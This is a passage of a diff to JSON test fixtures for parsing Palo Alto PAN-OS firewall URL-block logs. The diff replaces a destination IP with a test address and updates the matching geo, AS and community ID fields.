States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -3848,7 +3894,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:WmnET8BZufXJpdVk04PIVGj+Kgk=" + "community_id": "1:0FqP8MVruPuvjAz59u+Gj/lzSGo=" } }, "threat_category": "unknown", @@ -3893,8 +3939,8 @@ ], "network": { "community_id": [ - "1:oWKucHrzLhzCpDmWJPLBELyMrzw=", - "1:WmnET8BZufXJpdVk04PIVGj+Kgk=" + "1:pL9yHPA7wjpnmTYscqPRL0Q5+xk=", + "1:0FqP8MVruPuvjAz59u+Gj/lzSGo=" ], "transport": "tcp", "application": "ssl", @@ -3933,14 +3979,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767976722Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691774900Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3963,26 +4009,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3998,14 +4046,14 @@ "port": 53007, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4020,7 +4068,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qCp/BEY5ANYRj3J+xhPpjW00kTA=" + "community_id": "1:eq5SLfcTcU4mZ4g5wLjNF7kHsW0=" } }, "threat_category": "unknown", @@ -4065,8 +4113,8 @@ ], "network": { "community_id": [ - "1:63h3SPrH4/pr2GMJEkpg++zeJMU=", - "1:qCp/BEY5ANYRj3J+xhPpjW00kTA=" + "1:wTKe67Cvy+IC7F5EIMomomT6ztk=", + "1:eq5SLfcTcU4mZ4g5wLjNF7kHsW0=" ], "transport": "tcp", "application": "ssl", @@ -4105,14 +4153,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767980948Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691782700Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4135,26 +4183,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4170,14 +4220,14 @@ "port": 53008, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4192,7 +4242,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:QTdF07Qsc5riXT20oN+YWQ2Yt6U=" + "community_id": "1:4kwfarqeUgitq2Mp3dZlCh0FLtw=" } }, "threat_category": "unknown", @@ -4237,8 +4287,8 @@ ], "network": { "community_id": [ - "1:MpnxD3AYYy43RYm8rBQmgxv2NQ0=", - "1:QTdF07Qsc5riXT20oN+YWQ2Yt6U=" + "1:VLVokhfWAFkBzuEhAuorsFWSkMM=", + "1:4kwfarqeUgitq2Mp3dZlCh0FLtw=" ], "transport": "tcp", "application": "ssl", @@ -4277,14 +4327,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768022704Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691788200Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4307,26 +4357,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4342,14 +4394,14 @@ "port": 53010, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4364,7 +4416,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:v9tvyVPSkJni3/nd8jUVgcsqqQk=" + "community_id": "1:uBQde+10yg+hMJw8YmAHupesfX4=" } }, "threat_category": "unknown", @@ -4409,8 +4461,8 @@ ], "network": { "community_id": [ - "1:kibVei9WSdxBMV8iUIg8nZMCiss=", - "1:v9tvyVPSkJni3/nd8jUVgcsqqQk=" + "1:kqcVjslXHVTg+V8o9wHnMVL+u+k=", + "1:uBQde+10yg+hMJw8YmAHupesfX4=" ], "transport": "tcp", "application": "ssl", @@ -4449,14 +4501,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768032828Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691794800Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4479,26 +4531,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4514,14 +4568,14 @@ "port": 53011, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4536,7 +4590,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:00oN9bToRGtVdpy+GQ742sbkpfI=" + "community_id": "1:lV9xe2dpiqoz95S0AQewPBhBUoQ=" } }, "threat_category": "unknown", @@ -4581,8 +4635,8 @@ ], "network": { "community_id": [ - "1:l33FK2i+ASkvlnDYQYRCH4evHcI=", - "1:00oN9bToRGtVdpy+GQ742sbkpfI=" + "1:0otVMQCQ30HFRQUJTr4+alcjwcg=", + "1:lV9xe2dpiqoz95S0AQewPBhBUoQ=" ], "transport": "tcp", "application": "ssl", @@ -4621,14 +4675,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768036959Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691801100Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4651,26 +4705,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4686,14 +4742,14 @@ "port": 53012, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4708,7 +4764,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:AmJtkqyAyzgRUMxNGxjT3hhwb8c=" + "community_id": "1:mWhX5kk3U7lwbuZ6aeWuXQ+OJK0=" } }, "threat_category": "unknown", @@ -4753,8 +4809,8 @@ ], "network": { "community_id": [ - "1:cSD3ZfDTv0BFEStL/v2rRm0wow0=", - "1:AmJtkqyAyzgRUMxNGxjT3hhwb8c=" + "1:OWWjhlzrd2mpWDKP37qJh8lwa6s=", + "1:mWhX5kk3U7lwbuZ6aeWuXQ+OJK0=" ], "transport": "tcp", "application": "ssl", @@ -4793,14 +4849,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768040958Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691807400Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4823,26 +4879,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4858,14 +4916,14 @@ "port": 53013, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -4880,7 +4938,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CzGrIa22/gNrIvkcJMIh6eWNjFI=" + "community_id": "1:0jH7ur3HpAk757F68Xuoh7OL0uI=" } }, "threat_category": "unknown", @@ -4925,8 +4983,8 @@ ], "network": { "community_id": [ - "1:l8cnTJWO0qdKrXtvCBWHbQUpvgE=", - "1:CzGrIa22/gNrIvkcJMIh6eWNjFI=" + "1:FIZyD/FpcrfJdxESBSGBv5L/f3Q=", + "1:0jH7ur3HpAk757F68Xuoh7OL0uI=" ], "transport": "tcp", "application": "ssl", @@ -4965,14 +5023,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768044978Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691813700Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -4995,26 +5053,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5030,14 +5090,14 @@ "port": 53014, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 